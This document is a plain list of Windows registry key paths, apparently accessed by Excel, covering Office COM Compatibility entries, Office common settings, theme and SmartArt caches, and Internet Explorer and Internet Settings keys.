HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD2-48AA-11D2-8432-006008C3FBFC}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD2-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD2-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD3-48AA-11D2-8432-006008C3FBFC}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD3-48AA-11D2-8432-006008C3FBFC}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD3-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD3-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD4-48AA-11D2-8432-006008C3FBFC}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD4-48AA-11D2-8432-006008C3FBFC}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD4-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD4-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD5-48AA-11D2-8432-006008C3FBFC}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD5-48AA-11D2-8432-006008C3FBFC}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD5-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD5-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD8-48AA-11D2-8432-006008C3FBFC}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD8-48AA-11D2-8432-006008C3FBFC}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD8-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD8-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD9-48AA-11D2-8432-006008C3FBFC}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD9-48AA-11D2-8432-006008C3FBFC}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD9-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD9-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BDA-48AA-11D2-8432-006008C3FBFC}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BDA-48AA-11D2-8432-006008C3FBFC}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BDA-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BDA-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BDB-48AA-11D2-8432-006008C3FBFC}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BDB-48AA-11D2-8432-006008C3FBFC}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BDB-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BDB-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{25336920-03F9-11CF-8FD0-00AA00686F13}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{25336920-03F9-11CF-8FD0-00AA00686F13}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{25336920-03F9-11CF-8FD0-00AA00686F13}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{25336921-03F9-11CF-8FD0-00AA00686F13}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{25336921-03F9-11CF-8FD0-00AA00686F13}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{25336921-03F9-11CF-8FD0-00AA00686F13}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{25336921-03F9-11CF-8FD0-00AA00686F13}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{2D360200-FFF5-11d1-8d03-00a0c959bc0a}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{2D360200-FFF5-11d1-8d03-00a0c959bc0a}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{2D360200-FFF5-11d1-8d03-00a0c959bc0a}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{2D360200-FFF5-11d1-8d03-00a0c959bc0a}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{2D360201-FFF5-11d1-8D03-00A0C959BC0A}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{2D360201-FFF5-11d1-8D03-00A0C959BC0A}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{2D360201-FFF5-11d1-8D03-00A0C959BC0A}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{2D360201-FFF5-11d1-8D03-00A0C959BC0A}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F3D9-98B5-11CF-BB82-00AA00BDCE0B}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F3D9-98B5-11CF-BB82-00AA00BDCE0B}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F3D9-98B5-11CF-BB82-00AA00BDCE0B}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F3D9-98B5-11CF-BB82-00AA00BDCE0B}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}\ScopedActivationOLEJSOverride
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\WinHttpSecureProtocols
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F5C8-98B5-11CF-BB82-00AA00BDCE0B}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F5C8-98B5-11CF-BB82-00AA00BDCE0B}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F5C8-98B5-11CF-BB82-00AA00BDCE0B}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F5C8-98B5-11CF-BB82-00AA00BDCE0B}\ScopedActivationOLEJSOverride
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\ForceDefaultAutoLogonLevelLow
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F67D-98B5-11CF-BB82-00AA00BDCE0B}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F67D-98B5-11CF-BB82-00AA00BDCE0B}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F67D-98B5-11CF-BB82-00AA00BDCE0B}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{528D46B3-3A4B-4B13-BF74-D9CBD7306E07}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{528D46B3-3A4B-4B13-BF74-D9CBD7306E07}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{528D46B3-3A4B-4B13-BF74-D9CBD7306E07}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{528D46B3-3A4B-4B13-BF74-D9CBD7306E07}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{8856F961-340A-11D0-A96B-00C04FD705A2}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{8856F961-340A-11D0-A96B-00C04FD705A2}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{8856F961-340A-11D0-A96B-00C04FD705A2}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{AE24FDAE-03C6-11D1-8B76-0080C744F389}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{AE24FDAE-03C6-11D1-8B76-0080C744F389}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{AE24FDAE-03C6-11D1-8B76-0080C744F389}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{AE24FDAE-03C6-11D1-8B76-0080C744F389}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{CE39D6F3-DAB7-41B3-9F7D-BD1CC4E92399}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{CE39D6F3-DAB7-41B3-9F7D-BD1CC4E92399}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{CE39D6F3-DAB7-41B3-9F7D-BD1CC4E92399}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{CE39D6F3-DAB7-41B3-9F7D-BD1CC4E92399}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABAFC7-7F19-11D2-978E-0000F8757E2A}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABAFC7-7F19-11D2-978E-0000F8757E2A}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABAFC7-7F19-11D2-978E-0000F8757E2A}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABAFC7-7F19-11D2-978E-0000F8757E2A}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABAFD0-7F19-11D2-978E-0000F8757E2A}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABAFD0-7F19-11D2-978E-0000F8757E2A}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABAFD0-7F19-11D2-978E-0000F8757E2A}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABAFD0-7F19-11D2-978E-0000F8757E2A}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABB0C5-7F19-11D2-978E-0000F8757E2A}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABB0C5-7F19-11D2-978E-0000F8757E2A}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABB0C5-7F19-11D2-978E-0000F8757E2A}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABB0C5-7F19-11D2-978E-0000F8757E2A}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABB0C7-7F19-11D2-978E-0000F8757E2A}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABB0C7-7F19-11D2-978E-0000F8757E2A}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABB0C7-7F19-11D2-978E-0000F8757E2A}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABB0C7-7F19-11D2-978E-0000F8757E2A}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{F4E1E7F6-A035-41B3-9856-A3C3A1C4684F}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{F4E1E7F6-A035-41B3-9856-A3C3A1C4684F}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{F4E1E7F6-A035-41B3-9856-A3C3A1C4684F}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{F4E1E7F6-A035-41B3-9856-A3C3A1C4684F}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Common\UseAlternateOutlookAppUserModelId
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Fonts\CloudFontsVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\GracefulExit\EXCEL\2840\0
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\CrashPersistence\EXCEL\3476\0
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\FileFormatBallotBoxTelemetrySent
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\AcbControl
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\AcbOn
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\AcbSysIcon
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\AcbTips
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\AcbST
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Deprecated
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Themes\1033\NextUpdate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Themes\1033\TM03090430
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Themes\1033\TM03457444
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Themes\1033\TM04033917
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Themes\1033\TM04033919
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Themes\1033\TM04033921
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Themes\1033\TM03457464
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Themes\1033\TM04033925
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Themes\1033\TM03457475
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Themes\1033\TM10001114
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Themes\1033\TM04033927
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Themes\1033\TM03457485
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Themes\1033\TM03457491
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Themes\1033\TM03457496
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Themes\1033\TM10001115
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Themes\1033\TM03457503
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Themes\1033\TM03457510
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Themes\1033\TM04033929
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Themes\1033\TM04033937
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Themes\1033\TM03457515
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Themes\1033\TM03090434
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033\NextUpdate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033\TM03328884
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033\TM03328893
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033\TM03328905
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033\TM03328908
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033\TM03328916
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033\TM03328919
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033\TM03328925
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033\TM03328932
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033\TM03328935
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033\TM03328940
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033\TM03328998
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033\TM03328972
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033\TM03328951
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033\TM03328975
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033\TM03328983
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033\TM03328986
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033\TM03328990
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\NotificationsNeverShowAgainLanguages
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\DisableBackgrounds
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\UI Theme
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\Default UI Theme
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Default UI Theme
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UISettings\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UISettings\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UISettings\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UISettings\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UISettings\TrustLevel
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UISettings\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UISettings\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UISettings\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UISettings\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UISettings\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UISettings\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FrameTabWindow
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FrameTabWindow
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FrameTabWindow
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FrameMerging
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FrameMerging
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FrameMerging
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\SessionMerging
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\SessionMerging
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\SessionMerging
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\AdminTabProcs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\AdminTabProcs
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\AdminTabProcs
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\TabProcGrowth
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\TabProcGrowth
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\TabProcGrowth
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\EXCEL.EXE
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags
